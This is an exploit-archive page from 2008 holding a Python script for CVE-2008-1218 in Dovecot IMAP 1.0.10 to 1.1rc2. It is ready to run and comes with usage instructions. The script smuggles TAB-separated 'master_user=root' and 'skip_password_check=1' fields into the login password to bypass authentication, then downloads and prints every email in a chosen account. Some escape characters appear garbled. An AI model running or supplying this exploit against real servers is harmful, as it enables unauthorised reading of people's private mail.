[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Dovecot IMAP 1.0.10 <= 1.1rc2 Remote Email Disclosure Exploit
# Published : 2008-03-14
# Author : kcope
# Previous Title : NetWin Surgemail 3.8k4-4 IMAP post-auth Remote LIST Universal Exploit
# Next Title : Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit
#lame Dovecot IMAP [1.0.10 -> 1.1rc3] Exploit
#Here's an exploit for the recent TAB vulnerability in Dovecot.
#It's nothing special since in the wild there are few to none
#targets because of the special option which has to be set.
#see CVE Entry CVE-2008-1218
#Exploit written by Kingcope
import sys
import imaplib
print "Dovecot IMAP [1.0.10 -> 1.1rc2] Exploit"
print "Prints out all E-Mails for any account if special configuration option is set"
print "Exploit written by kingcopen"
if len(sys.argv)<3:
print "usage: %s <hostname/ip address> <account> [-nossl]" % sys.argv[0]
exit(0);
if len(sys.argv)>3 and sys.argv[3] == "-nossl":
M = imaplib.IMAP4(sys.argv[1])
else:
M = imaplib.IMAP4_SSL(sys.argv[1])
M.login(sys.argv[2], ""tmaster_user=roottskip_password_check=1"");
M.select()
print "login succeeded."
typ, data = M.search(None, 'ALL')
k=0
for num in data[0].split():
typ, data = M.fetch(num, '(RFC822)')
print 'Message %sn%sn' % (num, data[0][1])
k=k+1
M.close()
M.logout()
print "Messages read: %s" % k
# www.Syue.com [2008-03-14]